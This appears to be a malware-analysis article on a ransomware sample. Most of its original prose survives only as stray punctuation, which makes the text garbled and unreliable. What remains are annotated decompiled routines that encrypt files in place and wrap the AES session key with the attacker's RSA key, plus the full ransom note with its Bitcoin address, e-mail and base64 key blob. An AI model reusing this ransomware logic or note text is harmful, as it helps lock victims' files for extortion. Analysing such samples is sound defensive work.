, . .
, . 10-12 .
, .
( 13-00 27- ), , , . .
5- .
.
→ h**ps://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759 — .
→ h**ps://retdec.com/decompilation-run/ — .
— , windows , .
.
1. File handling depends on size: files of at most 1 MiB (0x100000 bytes) are mapped into memory and encrypted in place as a whole, while for larger files the fall-through path below clamps the data length and mapping size to 0x100000, so apparently only the first 1 MiB of a large file is encrypted. The relevant excerpt of the decompiled routine (the enclosing function is not shown):
// Decompiler note: "lpFileMappingAttributes" names a register that holds 0
// throughout this fragment; every use of it below reads as NULL/0.
// v6 appears to be the high dword of the file size (the low dword is
// lpFileSize), so this outer test looks like "size fits in 32 bits" — confirm
// against the caller.
if (v6 <= lpFileMappingAttributes) {
// Files of at most 1 MiB (0x100000 bytes) are mapped and encrypted whole.
if (lpFileSize <= 0x100000) {
dwNumberOfBytesToMap = (struct _LARGE_INTEGER *)lpFileSize;
pdwDataLen = dwNumberOfBytesToMap;
// Mapping size is rounded up to a 16-byte boundary and always gains one
// extra block, so the encrypted file grows by the cipher padding.
dwMaximumSizeLow = 16 * (lpFileSize / 16 + 1);
// CreateFileMappingW(hFile, NULL, flProtect = 4 = PAGE_READWRITE,
//                    dwMaximumSizeHigh = 0, dwMaximumSizeLow, lpName = NULL)
hFileMappingObject = CreateFileMappingW((char *)hFile2, (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes, 4, lpFileMappingAttributes, dwMaximumSizeLow, (int16_t *)lpFileMappingAttributes);
dwFileOffsetHigh = lpFileMappingAttributes;
// CreateFileMappingW returns NULL (not INVALID_HANDLE_VALUE) on failure.
if ((int32_t)hFileMappingObject != dwFileOffsetHigh) {
// dwDesiredAccess = 6 = FILE_MAP_WRITE | FILE_MAP_READ, offset 0/0,
// view length = original file size.
pbData = MapViewOfFile(hFileMappingObject, 6, dwFileOffsetHigh, dwFileOffsetHigh, (int32_t)dwNumberOfBytesToMap);
v4 = (int32_t)pbData;
hFile2 = v4;
hHash = lpFileMappingAttributes;
// MapViewOfFile NULL check (hHash is 0 here).
if (v4 != hHash) {
// The encryption key handle lives at offset +20 of the structure a2.
hKey = *(int32_t *)(a2 + 20);
// CryptEncrypt(hKey, hHash = 0, Final = TRUE ("1 % 2 != 0" is a constant
// true), dwFlags = 0, pbData, &pdwDataLen (in: file size, out: padded
// length), dwBufLen = rounded mapping size): the whole view is encrypted
// in place by a single final call, so the file is either fully encrypted
// or untouched — there is no partial state from this call.
v5 = CryptEncrypt(hKey, hHash, (int32_t)(struct _SECURITY_ATTRIBUTES *)1 % 2 != 0, hHash, pbData, (int32_t *)&pdwDataLen, dwMaximumSizeLow);
if (v5) {
// Only a successful encryption is flushed; pdwDataLen now holds the
// padded length (original size rounded up to the next block).
FlushViewOfFile((char *)hFile2, (int32_t)pdwDataLen);
}
UnmapViewOfFile((char *)hFile2);
}
CloseHandle(hFileMappingObject);
}
// The original file handle is closed and the routine returns from this
// branch whether or not the mapping/encryption above succeeded; the
// return value is just CloseHandle's result, not an encryption status.
handleClosed = CloseHandle(hFile);
g8 = v1;
g4 = v3;
return (char *)handleClosed;
}
}
// Fall-through for files larger than 1 MiB (or with a non-zero high size
// dword): data length and mapping size are clamped to 0x100000. The mapping
// and encryption for this path lie after this excerpt, so only the first
// 1 MiB appears to be encrypted — TODO confirm against the full function.
pdwDataLen = (struct _LARGE_INTEGER *)0x100000;
struct _SECURITY_ATTRIBUTES * v8 = (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes;
lpFileMappingAttributes2 = v8;
v7 = v8;
dwNumberOfBytesToMap2 = (struct _LARGE_INTEGER *)0x100000;
dwMaximumSizeLow = 0x100000;
}
, .
2. The ransom note README.TXT is dropped with the text below. The base64 block after "Your personal installation key:" is the per-victim value the victim is told to send back by e-mail together with the wallet ID. The sample note:
Ooops, your important files are encrypted.
If you see this text, then your files are no longer accessible, because
they have been encrypted. Perhaps you are busy looking for a way to recover
your files, but don't waste your time. Nobody can recover your files without
our decryption service.
We guarantee that you can recover all your files safely and easily.
All you need to do is submit the payment and purchase the decryption key.
Please follow the instructions:
1. Send $300 worth of Bitcoin to following address:
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
2. Send your Bitcoin wallet ID and personal installation key to e-mail wowsmith123456@posteo.net.
Your personal installation key:
AQIAAA5mAAAApAAAuoxiZtYONU+IOA/XL0Yt/lsBOfNmT9WBDYQ8LsRCWJbQ3iTs
Ka1mVGVmMpJxO+bQmzmEwwiy1Mzsw2hVilFIK1kQoC8lEZPvV06HFGBeIaSAfrf6
6kxuvs7U/fDP6RUWt3hGT4KzUzjU7NhIYKg2crEXuJ9gmgIE6Rq1hSv6xpscqvvV
Fg4k0EHN3TS9hSOWbZXXsDe9H1r83M4LDHA+NJmVM7CKPCRFc82UIQNZY/CDz/db
1IknT/oiBDlDH8fHDr0Z215M3lEy/K7PC4NSk9c+oMP1rLm3ZeL0BbGTBPAZvTLI
LkKYVqRSYpN+Mp/rBn6w3+q15DNRlbGjm1i+ow==
.
// Exports the session key as a wrapped CryptoAPI key blob and sizes a base64
// buffer for it. Reads two key handles from the structure at g3: the session
// key at +20 and the exchange key at +12 (hExpKey). On any failure g3 is
// cleared and the function returns. The listing is cut off in the article
// right after the base64 buffer is allocated, so the encoding call and what
// is done with the string are not visible here; the surrounding text
// indicates the result is the "personal installation key" in README.TXT.
void function_10001c7f(void) {
int32_t dwFlags = 0;
int32_t hKey = *(int32_t *)(g3 + 20);
int32_t pdwDataLen = 0;
int32_t v1;  // decompiler artifact: stored to g4 without ever being assigned
// Sizing call (pbData == NULL) — only fills pdwDataLen. dwBlobType 1 is
// SIMPLEBLOB: the session key encrypted under hExpKey, which per the CryptoAPI
// contract must be a key-exchange (e.g. RSA) key. Exporting this way means
// recovery of files needs the private half of that exchange key.
if (!CryptExportKey(hKey, *(int32_t *)(g3 + 12), 1, 0, NULL, &pdwDataLen)) {
g3 = (int32_t)NULL;
g4 = v1;
return;
}
// LocalAlloc(64 = LPTR = LMEM_FIXED | LMEM_ZEROINIT, pdwDataLen)
char * memoryHandle = LocalAlloc(64, pdwDataLen);
// NULL check (dwFlags is 0).
if ((int32_t)memoryHandle == dwFlags) {
g3 = (int32_t)NULL;
g4 = v1;
return;
}
int32_t hExpKey = *(int32_t *)(g3 + 12);
int32_t hKey2 = *(int32_t *)(g3 + 20);
// Second call writes the blob: BLOBHEADER, the wrapping ALG_ID, then the
// wrapped session key.
if (CryptExportKey(hKey2, hExpKey, 1, dwFlags, memoryHandle, &pdwDataLen)) {
int32_t pcchString = dwFlags;
// dwFlags 1 = CRYPT_STRING_BASE64; pszString == NULL, so this call only
// returns the required character count in pcchString (this mode inserts
// CRLF line breaks, which matches the 64-column wrapping seen in the note).
bool v2 = CryptBinaryToStringW(memoryHandle, pdwDataLen, 1, (int16_t *)dwFlags, &pcchString);
if (v2) {
// Wide-character output buffer: 2 bytes per character.
char * memoryHandle2 = LocalAlloc(64, 2 * pcchString);
int32_t hMem = (int32_t)memoryHandle2;
if (hMem == dwFlags) {
// Allocation failed: release the blob buffer before bailing out.
LocalFree(memoryHandle);
g3 = (int32_t)NULL;
g4 = v1;
return;
}
CryptExportKey is called with blob type 1 (SIMPLEBLOB), i.e. the session key wrapped with the exchange key, and the base64 form of that blob is what README.TXT prints as the "personal installation key". This can be checked directly against the note above: its first 16 base64 characters, AQIAAA5mAAAApAAA, decode to the bytes 01 02 00 00 0e 66 00 00 00 a4 00 00 — a BLOBHEADER with bType = 1 (SIMPLEBLOB), bVersion = 2, aiKeyAlg = 0x660e (CALG_AES_128), followed by the wrapping algorithm 0xa400 (CALG_RSA_KEYX). The whole block is 360 base64 characters = 268 bytes, so after the 12-byte header there are 256 bytes of RSA ciphertext, which points to a 2048-bit exchange key. In other words the "installation key" is the victim's AES-128 file key encrypted to the attacker's RSA public key; without the matching private key it cannot be unwrapped, and any recovery attempt would have to target the session key while it still exists in the process (it is only a handle here, so whether it is extractable from memory is not shown by this listing).
— , ? . , .
, , .
— , , , . 160-180 . , . 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX 10000$. , , , .
. .